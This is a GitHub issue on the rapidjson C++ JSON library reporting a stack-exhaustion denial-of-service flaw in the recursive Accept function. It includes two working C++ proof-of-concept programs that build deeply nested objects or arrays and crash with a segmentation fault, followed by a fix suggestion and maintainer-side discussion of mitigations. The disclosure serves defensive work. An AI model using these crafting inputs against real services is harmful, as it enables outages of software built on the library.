Tencent / rapidjson

A fast JSON parser/generator for C++ with both SAX/DOM style API
http://rapidjson.org/
Other
14.19k stars 3.53k forks source link

Stack exhaustion denial of service #2282

Open orihjfrog opened 4 months ago

orihjfrog commented 4 months ago

Summary

RapidJSON crashes when parsing a malformed JSON input.

Technical Details

The function Accept in document.h is used to visit values and handle them. When reaching an array or object, the code calls the Accept function recursively. The code does not have any limit to the nesting of such arrays or objects. Since the visiting of nested arrays and objects is done recursively, nesting too many of them can cause a stack exhaustion and crash the software. This happens even if the JSON string was originally parsed using the kParseIterativeFlag flag.

Proof of Concept

The following code will crash before printing the string “end”:

#include <iostream>
#include "rapidjson/document.h"
#include "rapidjson/stringbuffer.h"
#include "rapidjson/writer.h"

using namespace rapidjson;

int main() {
   std::string json = "{\"a\":";
   for (int i = 0; i < 500000; i++) {
       json += "{\"a\":";
   }
   json += "5";
   for (int i = 0; i < 500000; i++) {
       json += "}";
   }
   json += "}";

   Document d;

   std::cout << "before parsing" << std::endl << std::flush;

   d.Parse<kParseIterativeFlag>(json.c_str());

   Value& s = d["a"];

   std::cout << "before converting back to string" << std::endl << std::flush;

   StringBuffer buffer;
   Writer<StringBuffer> writer(buffer);
   s.Accept(writer);

   std::cout << "end" << std::endl << std::flush;

   std::flush(std::cout);
   return 0;
}

When running this code we got:

before parsing
before converting back to string
Segmentation fault

A similar error is raised when running the following code using arrays instead of objects:

#include <iostream>
#include "rapidjson/document.h"
#include "rapidjson/stringbuffer.h"
#include "rapidjson/writer.h"

using namespace rapidjson;

int main() {
   std::string json = "{\"a\":";
   for (int i = 0; i < 500000; i++) {
       json += "[";
   }
   json += "5";
   for (int i = 0; i < 500000; i++) {
       json += "]";
   }
   json += "}";

   Document d;

   std::cout << "before parsing" << std::endl << std::flush;

   d.Parse<kParseIterativeFlag>(json.c_str());

   Value& s = d["a"];

   std::cout << "before converting back to string" << std::endl << std::flush;

   StringBuffer buffer;
   Writer<StringBuffer> writer(buffer);
   s.Accept(writer);

   std::cout << "end" << std::endl << std::flush;

   std::flush(std::cout);
   return 0;
}

Fix suggestion

Add a variable that traces the amount of recursions done by the code that parses arrays and objects, and use it to throw a relevant exception when crossing a specified limit.

Credit

The vulnerability was discovered by Ori Hollander of the JFrog Security Research team.

srmish-jfrog commented 4 months ago

We could not find an official RapidJSON disclosure email address. We tried to report this issue privately to the package maintainer (miloyip@gmail.com) but didn't receive a response for more than 6 months. Hopefully someone can see this issue here and address it.

hagman commented 3 months ago

One could follow the suggestion and add an optional parameter maxrecursion to Accept with a suitable default value, test if the value is positive at the beginning of Accept (and either throw as suggested, or perhaps simply return false?), and of course pass maxrecursion-1 to recursive calls. -- Ironically, the extra parameter will consume even more stack space :)

One could get rid the extra parameter by using the address of a local variable as an indicator of the current top-of-stack and compare it with initial value upon first use. -- This requires work to make it thread-safe.

At any rate, it is not trivial to guess how much recursion is acceptable because available stack size may vary from a few kilobytes to several megabytes, depending on the environment. And who knows what the calling code already wasted. In other words, the safest strategy would probably be to turn the call-stack-recursion into using an explicit stack structure on the heap ... I guess

pagict commented 3 months ago

also see #2260